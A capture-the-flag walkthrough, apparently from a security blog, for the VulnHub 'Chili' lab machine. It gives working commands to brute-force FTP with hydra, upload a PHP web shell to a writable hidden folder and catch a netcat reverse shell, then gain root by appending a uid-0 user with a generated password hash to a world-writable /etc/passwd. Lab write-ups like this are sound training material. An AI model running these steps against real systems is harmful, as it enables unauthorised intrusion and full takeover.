Download > Chili
Bài này cung cấp nhiều kiến thức rất hay, hãy lab và quay video lại nếu có thể…
Giới thiệu
Summary
This one was a pretty tricky box that i enjoyed a lot! Is easy but you have to think smart. We start by brute forcing FTP this will give us access to all system files, we search for a writeable directory under /var/www/html
and we place our shell there. Privilege escalation to root is easy, /etc/passwd
is writeable. Let’s pwn it!
Enumeration/Reconnaissance
Let’s start as always with nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | $ ip=192.168.1.13 $ nmap -p- --min-rate 10000 $ip |
Port 80 has nothing interesting, i checked /robots.txt
i tried directory brute force with gobuster with lot of wordlists but nothing. Anyway i checked the hint that maker provided on vulnhub page If you ever get stuck, try again with the name of the lab
ahh here we go, let’s brute force FTP using username chili
. (takes some time)
1 2 3 4 5 6 7 8 9 10 11 | $ hydra -l chili -P /usr/share/wordlists/rockyou.txt $ip ftp [ftp] host: 192.168.1.13 login: chili password: a1b2c3d4 |
Shell as www-data
Perfect, we can login in as chili:a1b2c3d4
. I enumerated the system but there is no SSH so only 1 solution left if we upload a shell under /var/www/html
but isn’t writable. There is a hidden folder under /var/www/html
that is writable:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | $ ftp $ip ftp> cd /var/www/html ftp> ls -la 200 drwxr-xr-x 4 0 0 4096 Sep 08 13:12 . drwxr-xr-x 3 0 0 4096 Sep 08 11:41 .. drwxrwxrwx 2 0 0 4096 Sep 08 13:14 .nano <----- drwxr-xr-x 2 0 0 4096 Sep 08 13:12 .vim -rw-r--r-- 1 0 0 74290 Oct 23 2018 Chile_WEB.jpg -rw-r--r-- 1 0 0 657 Sep 08 11:44 index.html 226 Directory send OK. ftp> |
Let’s upload a php web shell under .nano
and make it executable.
1 2 3 4 5 6 7 8 9 10 | ftp> cd .nano ftp> put shell.php ftp> chmod 007 shell.php |
Now let’s execute it & get shell.
1 | $ curl http://$ip/.nano/shell.php |
1 2 3 4 5 6 | $ nc -lvp 5555 l $ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@chili:/$ whoami;id www-data uid=33(www-data) gid=33(www-data) groups=33(www-data) |
Shell as chili
We can use the same FTP password to privesc to user chili now.
1 2 3 4 5 6 | www-data@chili:/$ su - chili Password: a1b2c3d4 chili@chili:~$ whoami;id chili uid=1000(chili) gid=1000(chili) groups=1000(chili),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) |
Shell as root
After some enumeration, i found that /etc/passwd
is writable. Let’s simply add a root user in.
1 2 | chili@chili:~$ ls -la /etc/passwd -rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd |
Let’s generate a password:
1 2 | $ openssl passwd -6 -salt xyz pwned $6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1 |
Now we can add our user in.
1 2 3 4 5 6 7 | chili@chili:~$ echo 'pwned:$6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1:0:0::/root:/bin/bash' >> /etc/passwd chili@chili:~$ su - pwned Password: pwned root@chili:~# whoami;id root uid=0(root) gid=0(root) groups=0(root) |
Let’s read the flag.
1 2 | root@chili:~# cat proof.txt Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b |
2 be CEH MASTER !